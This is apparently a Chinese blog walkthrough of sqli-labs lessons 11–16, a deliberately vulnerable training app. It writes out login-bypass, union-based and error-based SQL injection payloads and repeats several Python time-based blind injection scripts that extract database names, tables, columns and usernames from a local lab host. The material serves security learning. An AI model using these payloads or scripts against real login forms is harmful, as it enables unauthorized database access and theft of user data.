• sqli-labs(3)

    11.

    看到登录框直接or 1=1

    在hackerabar中我们可以看到这里是post传递的数据,在get中用--+来注释后面的内容 因为get中#是用来指导浏览器动作的,--代表注释+是空格,所以这里用#

    之后就和get的一样了

    1' order by 2 #

    order by 3报错

    联合注入

    1' union select 1,2 #

    1‘ union select database(),2#

    1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #

    1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'#

    1' union select 1,group_concat(username) from security.users #

    12.

    1'没反应尝试”

    通过“尝试得到报错知道还要)

    1") or 1=1 #

    之后一样’

    1") union select 1,2 #

    1") union select 1,database() #

    1") union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #

    1") union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'#

    1") union select 1,group_concat(username) from security.users #

    13.

    1‘尝试出现报错,知道是1’)

    显示登录成功但不会出现提示但是有报错信息使用报错注入,这里使用报错注入我们使用两种报错注入方法

    1') and extractvalue(1,concat(0x5c,database()))#

    1') and updatexml(1,concat(0x7e,database(),0x7e),1) #

    注入得到表名

    1.  1')  and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#
    2.  1') and extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security'))) #
    3.  
    4.

    注入的列名

    1. 1') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)
    2. 1') and extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))#

    注入的数据

    1. 1') and updatexml(1,concat(0x7e,(select group_concat(username) from security.users ),0x7e),1)
    2. 1') and extractvalue(1,concat(0x5c,(select group_concat(username) from security.users)))#

    14.

    对输入框测试发现当输入1“ or 1=1 #登录成功

    使用报错注入

    1. 1" and updatexml(1,concat(0x7e,database(),0x7e),1)#
    2. 1" and extractvalue(1,concat(0x5c,database()))#

    得到数据库库名

    1. 1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#
    2. 1" and extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security')))#

    得到表名

    1. 1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#
    2. 1" and extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))#

    得到列名

    1. 1" and updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1)#
    2. 1" and extractvalue(1,concat(0x5c,(select group_concat(username) from security.users)))#

    15.

    当1’ or 1=1#返回登录成功

    这里看到如果输入的为错则返回登录失败不会出现报错信息使用布尔盲注

    这里我们要知道and 和or的区别 and'两边的条件都为真才会执行 or一边为真就会执行,而这里我们如果没有爆破过用户admin也不在username中那我们就只能使用or,这里的登录框根据经验第一个肯定是获取username的

    1. admin' and (substr(database(),1,1)='s')#
    2. 1' or (substr(database(),1,1)='s')#

    1' or (substr(database(),1,1)='a')#

    这里成功和失败只会返回不同的照片对于脚本来说没有很明显的特征我们使用sleep来写脚本

    1. import requests,time
    2. def database():
    3.         data_base = ''
    4.         charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    5.         while True:
    6.                 for char in charset:
    7.                         payload = {"uname":f"1' or if(substr(database(),{len(data_base) +1},1)='{char}',sleep(2),0)#","passwd":"123456"}
    8.                         url = "http://192.168.1.200:86/Less-15/"
    9.  
    10.                         start_time = time.time()
    11.                         rsp = requests.post(url,data=payload)
    12.                         end_stime = time.time()
    13.                         rsp_time = end_stime - start_time
    14.                         #print(f"耗时:{rsp_time}")
    15.                         if rsp_time > 2:
    16.                                 data_base += char
    17.                                 print(f"数据库名为:{data_base}")
    18.                                 break
    19.                 else:
    20.                         break
    21.         return data_base
    22.                         
    23.  
    24.  
    25.                         
    26. datas = database()
    27. print(f"最终数据库名为:{datas}")
    1' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(5),0)#

       

    1. def tablename():
    2.     table_name = ''
    3.     charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    4.     while True:
    5.         for char in charset:
    6.                 payload = {
    7.                            "uname":f"1' or if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),{len(table_name) +1},1)='{char}',sleep(2),0)#",
    8.                            "passwd":"123456"
    9.                            }
    10.                 url = "http://192.168.1.200:86/Less-15/"
    11.                     
    12.                 start_time = time.time()
    13.                 rsp = requests.post(url,data=payload)
    14.                 end_stime = time.time()
    15.                 rsp_time = end_stime - start_time
    16.                 if rsp_time > 2:
    17.                         table_name += char
    18.                         print(f"表名为:{table_name}")
    19.                         break
    20.         else:
    21.               break
    22.               
    23.     return table_name
    24.  
    25. tables = tablename()
    26. print(f"最终表名为:{tables}")

    1' or if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i',sleep(5),0)#

    1. def  columnname():
    2.         column_name = ''
    3.         charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    4.         while True:
    5.                 for char in charset:
    6.                         payload = {
    7.                                 "uname":f"1' or if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),{len(column_name) +1},1)='{char}',sleep(2),0)#",
    8.                                 "passwd":"123456"
    9.                         }
    10.                         url = "http://192.168.1.200:86/Less-15/"
    11.                         start_time = time.time()
    12.                         rsp = requests.post(url,data=payload)
    13.                         end_time = time.time()
    14.                         rsp_time = end_time - start_time
    15.  
    16.                         if rsp_time > 2:
    17.                                 column_name += char
    18.                                 print(f"列名为:{column_name}")
    19.                                 break
    20.                 else:
    21.                         break
    22.         return column_name
    23.  
    24. columns = columnname()
    25. print(f"最终列名为:{columns}")
    1' or if(substr((select username from security.users limit 0,1),1,1)='d',sleep(5),0)#

    1. def data():
    2.     data = ''
    3.     charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    4.     while True:
    5.         for char in charset:
    6.             payload = {
    7.                 "uname":f"1' or if(substr((select username from security.users limit 0,1),{len(data) +1},1)='{char}',sleep(2),0)#",
    8.                 "passwd":"123456"
    9.             }
    10.             url = "http://192.168.1.200:86/Less-15/"
    11.  
    12.             start_time = time.time()
    13.             rsp = requests.post(url,data=payload)
    14.             end_time = time.time()
    15.             rsp_time = end_time - start_time
    16.             if rsp_time > 2:
    17.                 data += char
    18.                 print(f"数据为:{data}")
    19.                 break
    20.         else:
    21.             break
    22.     return data
    23.  
    24. datadata = data()
    25. print(f"最终数据为:{datadata}")
    1. import requests,time
    2. def database():
    3.         data_base = ''
    4.         charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    5.         while True:
    6.                 for char in charset:
    7.                         payload = {"uname":f"1' or if(substr(database(),{len(data_base) +1},1)='{char}',sleep(2),0)#","passwd":"123456"}
    8.                         url = "http://192.168.1.200:86/Less-15/"
    9.  
    10.                         start_time = time.time()
    11.                         rsp = requests.post(url,data=payload)
    12.                         end_stime = time.time()
    13.                         rsp_time = end_stime - start_time
    14.                         #print(f"耗时:{rsp_time}")
    15.                         if rsp_time > 2:
    16.                                 data_base += char
    17.                                 print(f"数据库名为:{data_base}")
    18.                                 break
    19.                 else:
    20.                         break
    21.         return data_base
    22.                         
    23.  
    24.  
    25.                         
    26. datas = database()
    27. print(f"最终数据库名为:{datas}")
    28.  
    29. def tablename():
    30.     table_name = ''
    31.     charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    32.     while True:
    33.         for char in charset:
    34.                 payload = {
    35.                            "uname":f"1' or if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),{len(table_name) +1},1)='{char}',sleep(2),0)#",
    36.                            "passwd":"123456"
    37.                            }
    38.                 url = "http://192.168.1.200:86/Less-15/"
    39.                     
    40.                 start_time = time.time()
    41.                 rsp = requests.post(url,data=payload)
    42.                 end_stime = time.time()
    43.                 rsp_time = end_stime - start_time
    44.                 if rsp_time > 2:
    45.                         table_name += char
    46.                         print(f"表名为:{table_name}")
    47.                         break
    48.         else:
    49.               break
    50.               
    51.     return table_name
    52.  
    53. tables = tablename()
    54. print(f"最终表名为:{tables}")
    55.         
    56.                 
    57. def  columnname():
    58.         column_name = ''
    59.         charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    60.         while True:
    61.                 for char in charset:
    62.                         payload = {
    63.                                 "uname":f"1' or if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),{len(column_name) +1},1)='{char}',sleep(2),0)#",
    64.                                 "passwd":"123456"
    65.                         }
    66.                         url = "http://192.168.1.200:86/Less-15/"
    67.                         start_time = time.time()
    68.                         rsp = requests.post(url,data=payload)
    69.                         end_time = time.time()
    70.                         rsp_time = end_time - start_time
    71.  
    72.                         if rsp_time > 2:
    73.                                 column_name += char
    74.                                 print(f"列名为:{column_name}")
    75.                                 break
    76.                 else:
    77.                         break
    78.         return column_name
    79. columns = columnname()
    80. print(f"最终列名为:{columns}")
    81.                                    
    82. def data():
    83.     data = ''
    84.     charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    85.     while True:
    86.         for char in charset:
    87.             payload = {
    88.                 "uname":f"1' or if(substr((select username from security.users limit 0,1),{len(data) +1},1)='{char}',sleep(2),0)#",
    89.                 "passwd":"123456"
    90.             }
    91.             url = "http://192.168.1.200:86/Less-15/"
    92.  
    93.             start_time = time.time()
    94.             rsp = requests.post(url,data=payload)
    95.             end_time = time.time()
    96.             rsp_time = end_time - start_time
    97.             if rsp_time > 2:
    98.                 data += char
    99.                 print(f"数据为:{data}")
    100.                 break
    101.         else:
    102.             break
    103.     return data
    104.  
    105. datadata = data()
    106. print(f"最终数据为:{datadata}")

    16.

    测试发现1" or 1=1 #时登录成功

    1") or if(substr(database(),1,1)='s',sleep(5),0 )#

    1. import requests,time
    2.  
    3. def dataname():
    4.     data_name = ""
    5.     chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"
    6.     while True:
    7.         for char in chart:
    8.             payload = {
    9.                 "uname":f'1") or if(substr(database(),{len(data_name) +1},1)="{char}",sleep(2),0)#',
    10.                 "passwd":"123456"
    11.             }
    12.             url = "http://192.168.1.200:86/Less-16/"
    13.  
    14.             start_time =time.time()
    15.             rsp = requests.post(url,data=payload)
    16.             end_time = time.time()
    17.             rsp_time = end_time - start_time
    18.             if rsp_time >2:
    19.                 data_name += char
    20.                 print(f"数据库为:{data_name}")
    21.                 break
    22.         else:
    23.             break
    24.     return data_name
    25.  
    26. datas = dataname()
    27. print(f"最终数据名为:{datas}")

    1") or if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(5),0)#

    1. def tablename():
    2.     table_name = ""
    3.     chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"
    4.     while True:
    5.         for char in chart:
    6.             payload = {
    7.                 "uname":f'1") or if(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),{len(table_name) +1},1)="{char}",sleep(2),0)#',
    8.                 "passwd":"123456"
    9.             }
    10.             url = "http://192.168.1.200:86/Less-16/"
    11.             start_time =time.time()
    12.             rsp = requests.post(url,data=payload)
    13.             end_time = time.time()
    14.             rsp_time = end_time - start_time
    15.             if rsp_time >2:
    16.                 table_name += char
    17.                 print(f"表名为:{table_name}")
    18.                 break
    19.         else:
    20.             break
    21.     return table_name
    22.  
    23. tables = tablename()
    24. print(f"最终表名为:{tables}")

    1") or if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i',sleep(5),0)#

    1. def columnname():
    2.     column_name = ""
    3.     chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"
    4.     while True:
    5.         for char in chart:
    6.             payload = {
    7.                 "uname":f'1") or if(substr((select column_name from information_schema.columns where table_schema="security" and table_name="users" limit 0,1),{len(column_name) +1},1)="{char}",sleep(2),0)#',
    8.                 "passwd":"123456"
    9.             }
    10.             url = "http://192.168.1.200:86/Less-16/"
    11.             start_time =time.time()
    12.             rsp = requests.post(url,data=payload)
    13.             end_time = time.time()
    14.             rsp_time = end_time - start_time
    15.             if rsp_time >2:
    16.                 column_name += char
    17.                 print(f"字段名为:{column_name}")
    18.                 break
    19.         else:
    20.             break
    21.     return column_name    
    22.  
    23. columns =   columnname()
    24. print(f"最终字段名为:{columns}")

    1") or if(substr((select username from security.users limit 0,1),1,1)='d',sleep(5),0)#

    1. def data():
    2.     data = ""
    3.     chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"
    4.     while True:
    5.         for char in chart:
    6.             payload = {
    7.                 "uname":f'1") or if(substr((select username from security.users limit 0,1),{len(data) +1},1)="{char}",sleep(2),0)#',
    8.                 "passwd":"123456"
    9.             }
    10.             url =   "http://192.168.1.200:86/Less-16/"
    11.             start_time =time.time()
    12.             rsp = requests.post(url,data=payload)
    13.             end_time = time.time()
    14.             rsp_time = end_time - start_time
    15.             if rsp_time >2:
    16.                 data += char
    17.                 print(f"数据为:{data}")
    18.                 break
    19.         else:
    20.             break
    21.     return data
    22.  
    23. datas = data()    
    24. print(f"最终数据为:{datas}")

    最终脚本

    1. import requests,time
    2.  
    3. def dataname():
    4.     data_name = ""
    5.     chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"
    6.     while True:
    7.         for char in chart:
    8.             payload = {
    9.                 "uname":f'1") or if(substr(database(),{len(data_name) +1},1)="{char}",sleep(2),0)#',
    10.                 "passwd":"123456"
    11.             }
    12.             url = "http://192.168.1.200:86/Less-16/"
    13.  
    14.             start_time =time.time()
    15.             rsp = requests.post(url,data=payload)
    16.             end_time = time.time()
    17.             rsp_time = end_time - start_time
    18.             if rsp_time >2:
    19.                 data_name += char
    20.                 print(f"数据库为:{data_name}")
    21.                 break
    22.         else:
    23.             break
    24.     return data_name
    25.  
    26. datas = dataname()
    27. print(f"最终数据名为:{datas}")
    28.                 
    29. def tablename():
    30.     table_name = ""
    31.     chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"
    32.     while True:
    33.         for char in chart:
    34.             payload = {
    35.                 "uname":f'1") or if(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),{len(table_name) +1},1)="{char}",sleep(2),0)#',
    36.                 "passwd":"123456"
    37.             }
    38.             url = "http://192.168.1.200:86/Less-16/"
    39.             start_time =time.time()
    40.             rsp = requests.post(url,data=payload)
    41.             end_time = time.time()
    42.             rsp_time = end_time - start_time
    43.             if rsp_time >2:
    44.                 table_name += char
    45.                 print(f"表名为:{table_name}")
    46.                 break
    47.         else:
    48.             break
    49.     return table_name
    50.  
    51. tables = tablename()
    52. print(f"最终表名为:{tables}")
    53.  
    54.  
    55. def columnname():
    56.     column_name = ""
    57.     chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"
    58.     while True:
    59.         for char in chart:
    60.             payload = {
    61.                 "uname":f'1") or if(substr((select column_name from information_schema.columns where table_schema="security" and table_name="users" limit 0,1),{len(column_name) +1},1)="{char}",sleep(2),0)#',
    62.                 "passwd":"123456"
    63.             }
    64.             url = "http://192.168.1.200:86/Less-16/"
    65.             start_time =time.time()
    66.             rsp = requests.post(url,data=payload)
    67.             end_time = time.time()
    68.             rsp_time = end_time - start_time
    69.             if rsp_time >2:
    70.                 column_name += char
    71.                 print(f"字段名为:{column_name}")
    72.                 break
    73.         else:
    74.             break
    75.     return column_name    
    76.  
    77. columns =   columnname()
    78. print(f"最终字段名为:{columns}")
    79.  
    80.  
    81. def data():
    82.     data = ""
    83.     chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"
    84.     while True:
    85.         for char in chart:
    86.             payload = {
    87.                 "uname":f'1") or if(substr((select username from security.users limit 0,1),{len(data) +1},1)="{char}",sleep(2),0)#',
    88.                 "passwd":"123456"
    89.             }
    90.             url =   "http://192.168.1.200:86/Less-16/"
    91.             start_time =time.time()
    92.             rsp = requests.post(url,data=payload)
    93.             end_time = time.time()
    94.             rsp_time = end_time - start_time
    95.             if rsp_time >2:
    96.                 data += char
    97.                 print(f"数据为:{data}")
    98.                 break
    99.         else:
    100.             break
    101.     return data
    102.  
    103. datas = data()    
    104. print(f"最终数据为:{datas}")

  • 相关阅读:
    一次对BC网站的渗透测试实战
    【带RL负载的全波桥式整流器】功能齐全的单相非控整流器(Simulink)
    js兼容性的汇总
    基于HTML体育运动兵乓球网站项目的设计与实现【学生网页设计作业源码】
    【JavaEE】多线程案例-阻塞队列
    “目标检测”任务基础认识
    ubuntu的键盘F1~F12没有反应/出现问题(被系统强制为功能键了)
    Java并发-操作系统,进程,线程,并行并发?
    电视剧里的代码真能运行吗?
    ZYNQ移植uCOSIII
  • 原文地址:https://blog.csdn.net/qq_61988806/article/details/134448580